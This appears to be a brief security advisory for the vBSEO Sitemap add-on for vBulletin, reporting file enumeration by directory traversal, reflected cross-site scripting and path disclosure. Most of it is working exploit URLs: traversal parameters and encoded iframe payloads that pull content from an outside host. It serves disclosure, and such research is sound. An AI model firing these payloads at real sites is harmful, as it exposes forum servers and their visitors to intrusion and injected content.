vBSEO Sitemap – Multiple Vulnerabilities
vBSEO is prone to multiple vulnerabilities, such as path disclosure, enumeration of files, persistent and non-persistent XSS. Enumeration and confirmation of files can be done by accessing the URL http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?rlist=true&details=../../../vb4_readme.txt and http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=../../../../vb4_readme.txt. Non-persistent XSS can be done by accessing the URL http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E and http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E. Path disclosure can be done by accessing the URL http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_medialibrary.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vbblog.php